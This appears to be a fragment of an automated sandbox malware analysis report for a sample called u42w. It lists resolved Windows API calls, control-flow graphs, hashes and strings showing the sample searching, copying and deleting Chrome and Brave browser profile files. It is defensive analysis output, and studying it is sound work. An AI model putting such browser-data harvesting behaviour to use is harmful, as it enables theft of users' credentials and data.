98842 6c03b86e dllmain_crt_process_detach 98836->98842 98838 6c03b7d7 98869 6c03bf95 __std_type_info_destroy_list 98838->98869 98839 6c03b70d 98839->98825 98843 6c03b711 _initterm 98839->98843 98844 6c03b860 dllmain_crt_process_attach 98841->98844 98845 6c03b840 98841->98845 98842->98845 98843->98825 98844->98845 98848 6c03af33 98847->98848 98870 6c03b341 IsProcessorFeaturePresent 98848->98870 98850 6c03af3f ___scrt_uninitialize_crt 98850->98820 98871 6c03af8b 98851->98871 98853 6c03b06b 98853->98826 98854->98828 98856 6c03b077 ___scrt_release_startup_lock 98855->98856 98857 6c03b07b 98856->98857 98858 6c03b082 98856->98858 98881 6c03b341 IsProcessorFeaturePresent 98857->98881 98860 6c03b087 _configure_narrow_argv 98858->98860 98862 6c03b092 98860->98862 98863 6c03b095 _initialize_narrow_environment 98860->98863 98861 6c03b080 98861->98839 98862->98839 98863->98861 98865 6c03b20c ___scrt_fastfail 98864->98865 98866 6c03b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 98865->98866 98867 6c03b302 ___scrt_fastfail 98866->98867 98867->98829 98868->98838 98869->98846 98870->98850 98872 6c03af9a 98871->98872 98873 6c03af9e 98871->98873 98872->98853 98874 6c03b028 98873->98874 98876 6c03afab ___scrt_release_startup_lock 98873->98876 98875 6c03b1f7 ___scrt_fastfail 6 API calls 98874->98875 98877 6c03b02f 98875->98877 98878 6c03afb8 _initialize_onexit_table 98876->98878 98880 6c03afd6 98876->98880 98879 6c03afc7 _initialize_onexit_table 98878->98879 98878->98880 98879->98880 98880->98853 98881->98861 98882 6c03b8ae 98885 6c03b8ba ___scrt_is_nonwritable_in_current_image 98882->98885 98883 6c03b8c9 98884 6c03b8e3 dllmain_raw 98884->98883 98886 6c03b8fd dllmain_crt_dispatch 98884->98886 98885->98883 98885->98884 98887 6c03b8de 98885->98887 98886->98883 98886->98887 98895 6c01bed0 DisableThreadLibraryCalls LoadLibraryExW 98887->98895 98889 6c03b91e 98890 6c03b94a 98889->98890 98896 6c01bed0 DisableThreadLibraryCalls LoadLibraryExW 98889->98896 98890->98883 98891 6c03b953 dllmain_crt_dispatch 98890->98891 98891->98883 98892 6c03b966 dllmain_raw 98891->98892 98892->98883 98894 6c03b936 dllmain_crt_dispatch dllmain_raw 98894->98890 98895->98889 98896->98894

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60850), ref: 0041625D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F605F0), ref: 00416275
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61828), ref: 0041628E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61840), ref: 004162A6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61858), ref: 004162BE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F617E0), ref: 004162D7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F5EFB0), ref: 004162EF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F61798), ref: 00416307
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F617B0), ref: 00416320
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F617C8), ref: 00416338
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64FF0), ref: 00416350
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60870), ref: 00416369
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F606D0), ref: 00416381
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F606B0), ref: 00416399
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60750), ref: 004163B2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F65008), ref: 004163CA
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F65050), ref: 004163E2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F5F0F0), ref: 004163FB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60930), ref: 00416413
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F65020), ref: 0041642B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F65068), ref: 00416444
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64FD8), ref: 0041645C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F65080), ref: 00416474
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F607F0), ref: 0041648D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F65038), ref: 004164A5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64FC0), ref: 004164BD
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64FA8), ref: 004164D6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64DF8), ref: 004164EE
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64DC8), ref: 00416506
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64E58), ref: 0041651F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64EE8), ref: 00416537
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64E88), ref: 0041654F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64E10), ref: 00416568
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F41E48), ref: 00416580
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64ED0), ref: 00416598
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64D20), ref: 004165B1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60810), ref: 004165C9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64DB0), ref: 004165E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60830), ref: 004165FA
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64E70), ref: 00416612
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F64F18), ref: 0041662A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60570), ref: 00416643
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,02F60590), ref: 0041665B
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64F78,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64D68,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64EB8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64F00,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64F30,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64CD8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64CF0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(02F64D80,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,02F60210), ref: 0041670A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,02F64D08), ref: 00416722
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,02F61900), ref: 0041673A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,02F64E28), ref: 00416753
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75290000,02F60510), ref: 0041676B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F5F1B8), ref: 00416790
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F60490), ref: 004167A9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F5F258), ref: 004167C1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F64D98), ref: 004167D9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F64DE0), ref: 004167F2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F604B0), ref: 0041680A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F60430), ref: 00416822
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(73B50000,02F64F48), ref: 0041683B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,02F603B0), ref: 0041685C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,02F60470), ref: 00416874
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,02F64D38), ref: 0041688D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,02F64F60), ref: 004168A5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,02F604D0), ref: 004168BD
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,02F5EE98), ref: 004168E3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,02F5F2F8), ref: 004168FB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,02F64EA0), ref: 00416913
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,02F604F0), ref: 0041692C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,02F60390), ref: 00416944
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,02F5EFD8), ref: 0041695C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F64F90), ref: 00416982
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F60270), ref: 0041699A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F618F0), ref: 004169B2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F64CC0), ref: 004169CB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F64D50), ref: 004169E3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F60530), ref: 004169FB
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F60550), ref: 00416A14
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F64E40), ref: 00416A2C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,02F657A0), ref: 00416A44
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,02F60290), ref: 00416A66
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,02F65800), ref: 00416A7E
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,02F65818), ref: 00416A96
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,02F657B8), ref: 00416AAF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,02F657D0), ref: 00416AC7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75450000,02F605B0), ref: 00416AE8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75450000,02F605D0), ref: 00416B01
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75DA0000,02F60230), ref: 00416B22
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75DA0000,02F656E0), ref: 00416B3A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F60350), ref: 00416B60
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F601F0), ref: 00416B78
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F60310), ref: 00416B90
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F65830), ref: 00416BA9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F60410), ref: 00416BC1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F60450), ref: 00416BD9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F60370), ref: 00416BF2
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F090000,02F60250), ref: 00416C0A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,02F65770), ref: 00416C2B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,02F61A70), ref: 00416C44
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,02F65728), ref: 00416C5C
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,02F65740), ref: 00416C74
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75D90000,02F603D0), ref: 00416C96
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CBB0000,02F65848), ref: 00416CB7
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CBB0000,02F60330), ref: 00416CCF
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CBB0000,02F656C8), ref: 00416CE8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6CBB0000,02F65788), ref: 00416D00
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                                              • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                              • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                              • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                              • Opcode ID: e8da9f3cb671f9e2e72e0e6dc5b5f2ef113863f3a6db1ed0f498b9444beef9d5
                                                                                                                                                                                                                              • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8da9f3cb671f9e2e72e0e6dc5b5f2ef113863f3a6db1ed0f498b9444beef9d5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 880 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 899 40b6e1-40b6f5 StrCmpCA 880->899 900 40b6a4-40b6dc call 416e00 * 6 call 413220 880->900 902 40b6f7-40b70b StrCmpCA 899->902 903 40b70d 899->903 945 40bf8b-40bf8e 900->945 902->903 904 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 902->904 906 40bf30-40bf43 FindNextFileA 903->906 950 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 904->950 951 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 904->951 906->899 907 40bf49-40bf56 FindClose call 416e00 906->907 915 40bf5b-40bf86 call 416e00 * 5 call 413220 907->915 915->945 987 40b8a2-40b8b8 call 4170d0 StrCmpCA 950->987 951->987 990 40ba79-40ba8f StrCmpCA 987->990 991 40b8be-40b8d2 StrCmpCA 987->991 992 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 990->992 993 40bade-40baf4 StrCmpCA 990->993 991->990 994 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 991->994 1058 40bad6-40bad9 992->1058 997 40bb66-40bb7e call 416da0 call 415490 993->997 998 40baf6-40bb0d call 4170d0 StrCmpCA 993->998 1147 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 994->1147 1148 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 994->1148 1018 40bc51-40bc66 StrCmpCA 997->1018 1019 40bb84-40bb8b 997->1019 1009 40bb61 998->1009 1010 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 998->1010 1014 40beb9-40bec2 1009->1014 1010->1009 1020 40bf20-40bf2b call 417040 * 2 1014->1020 1021 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 1014->1021 1030 40be50-40be65 StrCmpCA 1018->1030 1031 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 1018->1031 1024 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1019->1024 1025 40bb8d-40bb94 1019->1025 1020->906 1095 40bf1a 1021->1095 1104 40bc46 1024->1104 1035 40bbf5 1025->1035 1036 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1025->1036 1030->1014 1040 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 1030->1040 1179 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 1031->1179 1180 40be26-40be3e call 4170d0 DeleteFileA call 417040 1031->1180 1052 40bc4c 1035->1052 1036->1035 1106 40beb3 1040->1106 1052->1014 1058->1014 1095->1020 1104->1052 1106->1014 1147->1148 1148->990 1196 40be20 1179->1196 1187 40be43-40be4e call 416e00 1180->1187 1187->1014 1196->1180
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040BF3B
                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                              • API String ID: 3334442632-726946144
                                                                                                                                                                                                                              • Opcode ID: 2f3d4e0d7f72a65d40ac37f929aa1a4e87005409591b75251453cd1fd56de732
                                                                                                                                                                                                                              • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f3d4e0d7f72a65d40ac37f929aa1a4e87005409591b75251453cd1fd56de732
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1197 6c0035a0-6c0035be 1198 6c0035c4-6c0035ed InitializeCriticalSectionAndSpinCount getenv 1197->1198 1199 6c0038e9-6c0038fb call 6c03b320 1197->1199 1200 6c0035f3-6c0035f5 1198->1200 1201 6c0038fc-6c00390c strcmp 1198->1201 1205 6c0035f8-6c003614 QueryPerformanceFrequency 1200->1205 1201->1200 1204 6c003912-6c003922 strcmp 1201->1204 1206 6c003924-6c003932 1204->1206 1207 6c00398a-6c00398c 1204->1207 1208 6c00361a-6c00361c 1205->1208 1209 6c00374f-6c003756 1205->1209 1212 6c003622-6c00364a _strnicmp 1206->1212 1213 6c003938 1206->1213 1207->1205 1208->1212 1214 6c00393d 1208->1214 1210 6c00375c-6c003768 1209->1210 1211 6c00396e-6c003982 1209->1211 1215 6c00376a-6c0037a1 QueryPerformanceCounter EnterCriticalSection 1210->1215 1211->1207 1216 6c003650-6c00365e 1212->1216 1217 6c003944-6c003957 _strnicmp 1212->1217 1213->1209 1214->1217 1218 6c0037b3-6c0037eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 1215->1218 1219 6c0037a3-6c0037b1 1215->1219 1220 6c00395d-6c00395f 1216->1220 1221 6c003664-6c0036a9 GetSystemTimeAdjustment 1216->1221 1217->1216 1217->1220 1222 6c0037fc-6c003839 LeaveCriticalSection 1218->1222 1223 6c0037ed-6c0037fa 1218->1223 1219->1218 1224 6c003964 1221->1224 1225 6c0036af-6c003749 call 6c03c110 1221->1225 1226 6c003846-6c0038ac call 6c03c110 1222->1226 1227 6c00383b-6c003840 1222->1227 1223->1222 1224->1211 1225->1209 1232 6c0038b2-6c0038ca 1226->1232 1227->1215 1227->1226 1233 6c0038cc-6c0038db 1232->1233 1234 6c0038dd-6c0038e3 1232->1234 1233->1232 1233->1234 1234->1199
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C08F688,00001000), ref: 6C0035D5
                                                                                                                                                                                                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0035E0
                                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 6C0035FD
                                                                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C00363F
                                                                                                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C00369F
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6C0036E4
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C003773
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6C08F688), ref: 6C00377E
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6C08F688), ref: 6C0037BD
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C0037C4
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6C08F688), ref: 6C0037CB
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6C08F688), ref: 6C003801
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6C003883
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C003902
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C003918
                                                                                                                                                                                                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C00394C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117587062.000000006C001000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117549990.000000006C000000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117761371.000000006C08E000.00000004.00000001.01000000.00000011.sdmpDownload File
